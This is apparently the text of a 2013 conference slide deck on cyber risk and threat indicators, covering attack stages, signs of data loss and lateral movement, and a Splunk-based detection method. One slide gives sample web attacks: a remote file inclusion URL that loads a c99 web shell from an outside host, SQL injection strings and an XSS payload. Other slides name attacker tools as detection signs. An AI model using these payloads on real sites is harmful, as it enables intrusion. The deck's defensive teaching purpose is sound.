Cyber  Risk  and  Threat  Indicators  Shane  Shook,  PhD  

Chief  Knowledge  Officer  and  Global  Vice  President  of  ConsulBng  Cylance  

   

#splunkconf  

1  

Risk  Does  Not  Equal  Threat  |  Cyber  Risks  and  Threat  Indicators  

2  

3  

Malware  –  Windows  /  Linux  /  OSX    (31%  didn’t  use  malware)   •  Dropper/downloaders – Phishing & Waterholing Malware

in Userspace Zero/Single-day Exploits that lead to…

•  Backdoor Trojan RATs – Kernel interactive Service Binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)

•  BOTNETs – Platforms for MAAS/Subscription Access

•  WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)

4  

Hacking  –  .day  Exploits  

•  Zero day •  Vulnerability that only the developer knows about

•  ½ day •  Vulnerability that is known about but no patches are yet available

•  Single day •  Vulnerability that is known about and patches are available but not

applied

•  Forever day •  Vulnerability that is known and cannot be patched

5  

Hacking  –  Web  Server/Services  Exploits  

•  Remote code execution (watch your .htaccess files!) •  register_globals on in PHP | require ($page . ".php"); !http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt

•  SQL injection (watch your user privileges!) •  AND / OR in SQL $query | $query = "SELECT * FROM users

WHERE username = '' or '1=1'";!http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version),,

•  Cross Site Scripting/XSS (watch your syntax!) •  Volatile entry in Echo | <?php echo "<p>Your Name <br />";

echo ($_GET[name_1]); ?> !http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>

•  Username enumeration (watch your error messages!) •  Username guessing | Incorrect logon / password combination

6  

Social  Engineering  –  Access,  Behavior,  and  Authority  

Subversion   •  Contractors •  Employees

Sabotage   •  Phishing •  Waterholing •  USB “HoneyDrops” & other free

hardware •  “HelpDesk Operators” •  “Visitors” (repairmen, janitors, pizza/

flower delivery, tailgaters)

7  

Advanced  Persistent  Threat  –  Ac#vi#es  

Stage  2  -­‐  Exploit   •  Privilege escalation •  Lateral movement •  User profile abuse •  Remote access

provisioning •  Services bypass/

cancellation

Stage  1  -­‐  Compromise   •  Social engineering

backdoors •  Phishing / waterholing •  Help Desk / visitors

•  Web site backdoors •  Reconnaissance

Stage  3  -­‐  Control   •  Configuration

management •  Data targeting •  Data exfiltration •  Sabotage •  Subversion

8  

Most  Commonly  Seen  Indicators  of  Data  Loss:    •  Non-standard packagers (7z, Gz, RAR, PKZIP, etc.)

•  Multipart files of particular sizes (250/500Mb)

•  “Recyle”/RecycleBin residue

•  HTTP 206 status codes on web servers

•  Non-standard file transfer services (Filezilla, FTP, WsFTP, etc.)

•  Non-standard reverse/proxy services (HUCs, PLINK, NC, SSH, etc.)

9  

Most  Commonly  Seen  Indicators  of  Sabotage:    •  Unusual Prefetch / Recent / LNK / Bash binary execution history

•  AT / CRON jobs

•  Scripts

•  Services cancellation

•  User profile authority changes

10  

Most  Commonly  Seen  Indicators  of  User  Profile  Abuse:    •  Multiple user accounts on single computer

•  User account on multiple computers

•  Service & administrative account propagation

•  Extranet LDAP/AD account use

•  Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)

•  Local  services  history  (MIMIKATZ,  PWDUMP,  L0pht,  CAIN/ABEL)  

11  

Most  Commonly  Seen  Indicators  of  Lateral  Movement:    •  Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)

•  MSTSC history (.RDP, .BMC)

•  Remote job scheduling (AT, SC, WMIC, SSH)

•  Redundant & non-standard RAS tools (VNC, LogMeIn, TeamView, NC, PUTTY, PSEXEC, *FTP, SCP)

•  Domain services history (DSGET, DSQUERY, HYENA)

•  Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)

12  

Most  Commonly  Seen  Indicators  of  Insider  Threats:    •  Unusual profile access and use history

•  Time •  HostID •  Application history •  Configuration history

•  RBAC violations

•  Other acceptable use policy violations

•  Malware / PUP / PUM…

13  

Most  Common  Malware  Iden#fiers:    •  Authority – service, administrator, or user

•  Persistence – only 4 persistence mechanisms in Windows

•  Communications – only 44 netsvcs keys in Windows Services

•  Functionality – user and kernel combinations are rare

•  File System – user or system

14  

Scope of the Investigation

Coverage of the IT Environment

File and Operating System Audit

Network Logs Audit

Host Memory Analysis

Host Disk Forensics

Network Forensics

Phase 1 (Diagnose)

Phase 2 (Assess)

Phase 3 (Collect)

CollecQon  

Windows.bat  

Linux.sh  

OSX.sh  

Processing  

Presponse.py  • ExtracQon  • Parsing  • NormalizaQon  • Transform  • Load  

Analysis  

SQL  

Excel  PowerPivot  

ReporQng  

Compromise  Assessment  

Exhibits  

Cylance  Presponse™  Method  

15  

Cylance  Infinity  –  Machine  Learning  for  Advanced  DetecBon  

16  

Cylance  Infinity  API  –  Submit  Files  or  Lookup  Hashes  

17  

Presponse  on  Splunk  Splunk Universal Forwarder •  Scripted input collection of Presponse Phase 1

data

•  Leverage the existing Splunk deployment

•  Managed via the Splunk Development Server

Presponse App •  Saved searches ü  Data loss or sabotage ü  User profile propagation ü  Lateral movement ü  Malware and IOCs ü  Build and application

inconsistencies

•  Dashboards, form searches and other views

•  Field extractions

•  Lookups (e.g. Infinity)

SourceTypes •  Processes ü  Executable path ü  Modules ü  Handles ü  Connections

•  Services

•  Autoruns

•  Tasks

•  Prefetch

•  Filesystem

•  User profiles

18  

Infinity  External  Lookup  Add-­‐on  •  Reusable Splunk component that packages an external lookup script based on py2INFINITY •  Lookup SHA-256 (and soon MD5) hashes in sourcetypes •  Extend with file upload/response capability

19  

1.  What files are known bad? 2.  What files are unknown? 3.  Where are the files located in FS? 4.  How many computers are they on? 5.  When were they created? 6.  Who used them?

•  Malware is only an indicator, not a threat

•  It is a risk that should be evaluated by related user history

•  A threat is determined by the impact it had or may have on the business

20  

21  

22  

23  

24  

25  

Risk Threat Unpatched software Vulnerable to exploits “.”day exploit Used in place of malware Malware Used to reconnoiter or sabotage systems Uncontrolled access Persistent access to non-public information Undocumented systems Lack of awareness Tools vs. experience Lack of perspective Outsourcing Lack of control

When  is  a  Risk  a  Threat?  

26  

Sshook@Cylance.com  |  Cyber  Risks  and  Threat  Indicators  

27  

Next Steps

28  

1  

2  

3  

Download  the  .conf2013  Mobile  App  If  not  iPhone,  iPad  or  Android,  use  the  Web  App  

 Take  the  survey  &  WIN  A  PASS  FOR  .CONF2014…  Or  one  of  these  bags!  

 Check  out  the  other  “Using  Splunk”  presentaBons  All  PPTs  are  in  the  Mobile  App  Videos  will  be  uploaded  shortly